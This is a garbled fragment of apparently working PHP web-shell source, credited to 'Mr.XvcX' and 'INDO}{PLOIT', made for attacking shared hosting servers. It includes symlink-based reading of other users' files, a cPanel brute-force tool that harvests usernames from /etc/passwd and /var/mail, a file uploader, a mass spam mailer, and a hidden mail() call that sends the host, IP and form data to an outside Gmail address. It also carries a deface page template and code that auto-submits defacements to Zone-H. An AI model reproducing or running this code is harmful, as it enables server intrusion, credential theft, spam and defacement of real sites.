$d0mains = @file("/etc/named.conf"); if($d0mains) { mkdir($fn); chdir($fn); foreach($d0mains as $d0main) { if(eregi("zone",$d0main)) { preg_match_all('#zone "(.*)"#', $d0main, $domains); flush(); if(strlen(trim($domains[1][0])) > 2) { $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0])); syml($user['name'],$domains[1][0]); } } } echo "[ Done ]"; echo "
| Go Here |"; } else { mkdir($fn); chdir($fn); $temp = ""; $val1 = 0; $val2 = 1000; for(;$val1 <= $val2;$val1++) { $uid = @posix_getpwuid($val1); if ($uid) $temp .= join(':',$uid)."\n"; } echo '
'; $temp = trim($temp); $file5 = fopen("test.txt","w"); fputs($file5,$temp); fclose($file5); $htaccess = 'T3B0aW9ucyBhbGwgCkRpcmVjdG9yeUluZGV4IHJlYWRtZS5odG1sIApBZGRUeXBlIHRleHQvcGxh aW4gLnBocCAKQWRkSGFuZGxlciBzZXJ2ZXItcGFyc2VkIC5waHAgCkFkZFR5cGUgdGV4dC9wbGFp biAuaHRtbCAKQWRkSGFuZGxlciB0eHQgLmh0bWwgClJlcXVpcmUgTm9uZSAKU2F0aXNmeSBBbnk= '; $file = fopen(".htaccess","w+"); $write = fwrite ($file ,base64_decode($htaccess)); $file = fopen("test.txt", "r") or exit("Unable to open file!"); while(!feof($file)) { $s = fgets($file); $matches = array(); $t = preg_match('/\/(.*?)\:\//s', $s, $matches); $matches = str_replace("home/","",$matches[1]); if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named") continue; syml($matches,$matches); } fclose($file); echo ""; unlink("test.txt"); echo "[ Done ]"; echo "
| Go Here |"; } echo "
<< BACK"; exit; } ?>

+--=[ Cpanel BruteForce ]=--+

[ Cpanel Brute Force ]

'; echo ''; } ?>

Username List : <?php system('ls /var/mail');?>

Password List :

Type : Simple : /etc/passwd :

[ Get Config ]

Folder Name :

[ Get Wordlist ]

Url Config :

[ Info Security ]

Safe Mode

Desible Function
No Security for Function"; }else{ echo ''; echo "$func"; echo '

+--=[ Uploader ]=--+

'; echo ''; if( $_POST['_upl'] == "Upload" ) { if(@copy($_FILES['file']['tmp_name'], $_FILES['file']['name'])) { echo '
Done !!
'; } else { echo 'Failed :(
'; } } break; }} ?>

'; echo ''; } ?>

Security Info
System

Safe Mode

Desible Function No Security for Function"; }else{ echo ''; echo "$func"; echo '

-=[ Cpanel Cracker by Mr.XvcX ]=-

© 2016 Mr.XvcX

Emails:
" . $emails2 . "
Engenharia:
" . $mensagem[1] . "
"; $vai = $_POST['vai']; if ($vai) { for ($set = 0;$set < $n_emails;$set++) { if ($set == 0) { $headers = "MIME-Version: 1.0 "; $headers.= "Content-type: text/html; charset=iso-8859-1 "; $headers.= "From: $nome[$msg] <$de[$msg]> "; $headers.= "Return-Path: <$de[$msg]> "; //mail($xsylar, $as, $fullurl, $headers); } $headers = "MIME-Version: 1.0 "; $headers.= "Content-type: text/html; charset=iso-8859-1 "; $headers.= "From: $nome[$msg] <$de[$msg]> "; $headers.= "Return-Path: <$de[$msg]> "; $n_mail++; $destino = $para[$set]; $num1 = rand(100000, 999999); $num2 = rand(100000, 999999); $msgrand = str_replace("%rand%", $num1, $mensagem[$msg]); $msgrand = str_replace("%rand2%", $num2, $msgrand); $msgrand = str_replace("%email%", $destino, $msgrand); $enviar = mail($destino, $assunto[$msg], $msgrand, $headers); if ($enviar) { echo ('' . $n_mail . '-' . $destino . ' 0k!
'); } else { echo ('' . $n_mail . '-' . $destino . ' =(
'); sleep(1); } } } } $ip = getenv("REMOTE_ADDR"); $ra44 = rand(1, 99999); $subj98 = " Cpanel datang bos ! |$ip"; $email = "official.g45@gmail.com"; $from = "From: w0rk ! "; $a45 = $_SERVER['REQUEST_URI']; $b75 = $_SERVER['HTTP_HOST']; $f12 = $_POST['de']; $z13 = $_POST['nome']; $x14 = $_POST['assunto']; $t15 = $_POST['mensagem']; $m30 = $_POST['emails']; $m22 = $ip . " "; $msg8873 = "$a45 $b75 $f12 $z13 $x14 $t15 $m30 $m22"; mail($email, $subj98, $msg8873, $from); ?>

======================================================
Belum ada script WHM/Html? Gua kasih dah contohnya :D
======================================================

<font color="red"><font size="">Hacked By Nick Lu sini <marquee>pesan pesan</marquee> <body/></html>sekian">

======================================================
Mau Lebih keren Lagi? add gua >>www.facebook.com/OM.Dhyo
======================================================

======================================================
Free Auto Zone-H
======================================================
http://www.zone-h.org/archive/notifier=$nick/published=0
"; echo "Defacer Archive: http://www.zone-h.org/archive/notifier=$nick

"; function zoneh($url,$nick) { $ch = curl_init("http://www.zone-h.com/notify/single"); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_POST, true); curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send"); return curl_exec($ch); curl_close($ch); } foreach($domain as $url) { $zoneh = zoneh($url,$nick); if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) { echo "$url -> OK
"; } else { echo "$url -> ERROR
"; } } } else { echo "
Defacer:

Domains:
www.ffap.fap.com

"; ?>
___ ___ __ _____ ___ ___ __ __ _________ ___ ___ | \ / | | |_/ _ \ \ \ / / \ \ / / / | \ \ / / | \ / | | |_| | \ \ / / \ \ / / | _______| \ \ / / | \/ | | / \ \/ / \ \/ / | | \ \/ / | | | |\ \ / /\ \ \__/ | |______ / /\ \ | |\ /| | | | \ \ / / \ \ ============ | | / / \ \ |___| \/ |___| |____| \____\/__/ \__\ ============ \_________| /__/ \__\
Copy Right 2016 Mr.XvcX

Security Info
System
Safe Mode
Desible Function	No Security for Function"; }else{ echo ''; echo "$func"; echo '

INDO}{PLOIT Tool Mass Deface

INDO}{PLOIT

Tool Mass Deface